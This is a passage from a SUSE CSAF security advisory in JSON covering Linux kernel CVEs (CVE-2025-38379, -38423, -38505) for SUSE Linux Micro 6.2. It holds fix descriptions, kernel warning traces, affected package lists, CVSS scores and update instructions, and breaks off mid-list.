lock_release+0x29b/0x390\n process_one_work+0x4c5/0xa10\n ? __pfx_process_one_work+0x10/0x10\n ? __list_add_valid_or_report+0x37/0x120\n worker_thread+0x2f1/0x5a0\n ? __kthread_parkme+0xde/0x100\n ? __pfx_worker_thread+0x10/0x10\n kthread+0x1fe/0x380\n ? kthread+0x10f/0x380\n ? __pfx_kthread+0x10/0x10\n ? local_clock_noinstr+0xd/0xd0\n ? ret_from_fork+0x1b/0x1f0\n ? local_clock+0x15/0x30\n ? lock_release+0x29b/0x390\n ? rcu_is_watching+0x20/0x50\n ? __pfx_kthread+0x10/0x10\n ret_from_fork+0x15b/0x1f0\n ? __pfx_kthread+0x10/0x10\n ret_from_fork_asm+0x1a/0x30\n \u003c/TASK\u003e\nirq event stamp: 1116206\nhardirqs last enabled at (1116205): [\u003cffffffff8143af42\u003e] __up_console_sem+0x52/0x60\nhardirqs last disabled at (1116206): [\u003cffffffff81399f0e\u003e] queue_delayed_work_on+0x6e/0xc0\nsoftirqs last enabled at (1116138): [\u003cffffffffc04562fd\u003e] __smb_send_rqst+0x42d/0x950 [cifs]\nsoftirqs last disabled at (1116136): [\u003cffffffff823d35e1\u003e] release_sock+0x21/0xf0",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38379",
"url": "https://www.suse.com/security/cve/CVE-2025-38379"
},
{
"category": "external",
"summary": "SUSE Bug 1247030 for CVE-2025-38379",
"url": "https://bugzilla.suse.com/1247030"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-38379"
},
{
"cve": "CVE-2025-38423",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38423"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nASoC: codecs: wcd9375: Fix double free of regulator supplies\n\nDriver gets regulator supplies in probe path with\ndevm_regulator_bulk_get(), so should not call regulator_bulk_free() in\nerror and remove paths to avoid double free.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38423",
"url": "https://www.suse.com/security/cve/CVE-2025-38423"
},
{
"category": "external",
"summary": "SUSE Bug 1247292 for CVE-2025-38423",
"url": "https://bugzilla.suse.com/1247292"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-38423"
},
{
"cve": "CVE-2025-38505",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38505"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: mwifiex: discard erroneous disassoc frames on STA interface\n\nWhen operating in concurrent STA/AP mode with host MLME enabled,\nthe firmware incorrectly sends disassociation frames to the STA\ninterface when clients disconnect from the AP interface.\nThis causes kernel warnings as the STA interface processes\ndisconnect events that don\u0027t apply to it:\n\n[ 1303.240540] WARNING: CPU: 0 PID: 513 at net/wireless/mlme.c:141 cfg80211_process_disassoc+0x78/0xec [cfg80211]\n[ 1303.250861] Modules linked in: 8021q garp stp mrp llc rfcomm bnep btnxpuart nls_iso8859_1 nls_cp437 onboard_us\n[ 1303.327651] CPU: 0 UID: 0 PID: 513 Comm: kworker/u9:2 Not tainted 6.16.0-rc1+ #3 PREEMPT\n[ 1303.335937] Hardware name: Toradex Verdin AM62 WB on Verdin Development Board (DT)\n[ 1303.343588] Workqueue: MWIFIEX_RX_WORK_QUEUE mwifiex_rx_work_queue [mwifiex]\n[ 1303.350856] pstate: 60000005 (nZCv daif -PAN -UAO -TCO -DIT -SSBS BTYPE=--)\n[ 1303.357904] pc : cfg80211_process_disassoc+0x78/0xec [cfg80211]\n[ 1303.364065] lr : cfg80211_process_disassoc+0x70/0xec [cfg80211]\n[ 1303.370221] sp : ffff800083053be0\n[ 1303.373590] x29: ffff800083053be0 x28: 0000000000000000 x27: 0000000000000000\n[ 1303.380855] x26: 0000000000000000 x25: 00000000ffffffff x24: ffff000002c5b8ae\n[ 1303.388120] x23: ffff000002c5b884 x22: 0000000000000001 x21: 0000000000000008\n[ 1303.395382] x20: ffff000002c5b8ae x19: ffff0000064dd408 x18: 0000000000000006\n[ 1303.402646] x17: 3a36333a61623a30 x16: 32206d6f72662063 x15: ffff800080bfe048\n[ 1303.409910] x14: ffff000003625300 x13: 0000000000000001 x12: 0000000000000000\n[ 1303.417173] x11: 0000000000000002 x10: ffff000003958600 x9 : ffff000003625300\n[ 1303.424434] x8 : ffff00003fd9ef40 x7 : ffff0000039fc280 x6 : 0000000000000002\n[ 1303.431695] x5 : ffff0000038976d4 x4 : 0000000000000000 x3 : 0000000000003186\n[ 1303.438956] x2 : 000000004836ba20 x1 : 0000000000006986 x0 : 00000000d00479de\n[ 1303.446221] Call trace:\n[ 1303.448722] cfg80211_process_disassoc+0x78/0xec [cfg80211] (P)\n[ 1303.454894] cfg80211_rx_mlme_mgmt+0x64/0xf8 [cfg80211]\n[ 1303.460362] mwifiex_process_mgmt_packet+0x1ec/0x460 [mwifiex]\n[ 1303.466380] mwifiex_process_sta_rx_packet+0x1bc/0x2a0 [mwifiex]\n[ 1303.472573] mwifiex_handle_rx_packet+0xb4/0x13c [mwifiex]\n[ 1303.478243] mwifiex_rx_work_queue+0x158/0x198 [mwifiex]\n[ 1303.483734] process_one_work+0x14c/0x28c\n[ 1303.487845] worker_thread+0x2cc/0x3d4\n[ 1303.491680] kthread+0x12c/0x208\n[ 1303.495014] ret_from_fork+0x10/0x20\n\nAdd validation in the STA receive path to verify that disassoc/deauth\nframes originate from the connected AP. Frames that fail this check\nare discarded early, preventing them from reaching the MLME layer and\ntriggering WARN_ON().\n\nThis filtering logic is similar with that used in the\nieee80211_rx_mgmt_disassoc() function in mac80211, which drops\ndisassoc frames that don\u0027t match the current BSSID\n(!ether_addr_equal(mgmt-\u003ebssid, sdata-\u003evif.cfg.ap_addr)), ensuring\nonly relevant frames are processed.\n\nTested on:\n- 8997 with FW 16.68.1.p197",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38505",
"url": "https://www.suse.com/security/cve/CVE-2025-38505"
},
{
"category": "external",
"summary": "SUSE Bug 1248185 for CVE-2025-38505",
"url": "https://bugzilla.suse.com/1248185"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.3,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
